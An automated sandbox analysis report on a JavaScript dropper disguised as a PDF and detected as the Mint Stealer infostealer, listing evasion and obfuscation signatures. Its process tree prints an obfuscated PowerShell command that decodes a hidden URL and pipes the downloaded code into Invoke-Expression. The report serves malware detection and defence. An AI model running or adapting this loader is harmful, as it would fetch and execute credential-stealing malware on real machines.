Edit tour
Windows
Analysis Report
_DRP12938938231_PDF.js
Overview
General Information
Detection
Mint Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mint Stealer
Creates processes via WMI
JavaScript source code contains functionality to generate code involving a shell, file or stream
Loading BitLocker PowerShell Module
Obfuscated command line found
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- wscript.exe (PID: 5884 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\_DRP1 2938938231 _PDF.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - conhost.exe (PID: 2848 cmdline:
conhost -- headless p owershell $xyhqerilk pf='ur' ;n ew-alias p rintout c$ ($xyhqeril kpf)l;$rlg ibutmdjea= (8606,8593 ,8596,8589 ,8595,8613 ,8608,8542 ,8608,8589 ,8595,8613 ,8588,8537 ,8607,8602 ,8603,8538 ,8540,8537 ,8603,8595 ,8603,8554 ,8606,8552 ,8600,8596 ,8601,8607 ,8606,8541 ,8540);$pw zlqamobsvi r=('bronx' ,'get-cmdl et');$fgnc dqhom=$rlg ibutmdjea; foreach($z awohn in $ fgncdqhom) {$iegjlbcr =$zawohn;$ robvxc=$ro bvxc+[char ]($iegjlbc r-8491);$t ozjeb=$rob vxc; $jvdh bt=$tozjeb };$vdtwhne bils[2]=$j vdhbt;$nmb tsery='rl' ;$qcmshfko tzdnwr=1;. $([char](9 992-9887)+ 'e'+'x')(p rintout -u seb $jvdhb t) MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2356 cmdline:
powershell $xyhqeril kpf='ur' ; new-alias printout c $($xyhqeri lkpf)l;$rl gibutmdjea =(8606,859 3,8596,858 9,8595,861 3,8608,854 2,8608,858 9,8595,861 3,8588,853 7,8607,860 2,8603,853 8,8540,853 7,8603,859 5,8603,855 4,8606,855 2,8600,859 6,8601,860 7,8606,854 1,8540);$p wzlqamobsv ir=('bronx ','get-cmd let');$fgn cdqhom=$rl gibutmdjea ;foreach($ zawohn in $fgncdqhom ){$iegjlbc r=$zawohn; $robvxc=$r obvxc+[cha r]($iegjlb cr-8491);$ tozjeb=$ro bvxc; $jvd hbt=$tozje b};$vdtwhn ebils[2]=$ jvdhbt;$nm btsery='rl ';$qcmshfk otzdnwr=1; .$([char]( 9992-9887) +'e'+'x')( printout - useb $jvdh bt) MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
System Summary |
---|
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |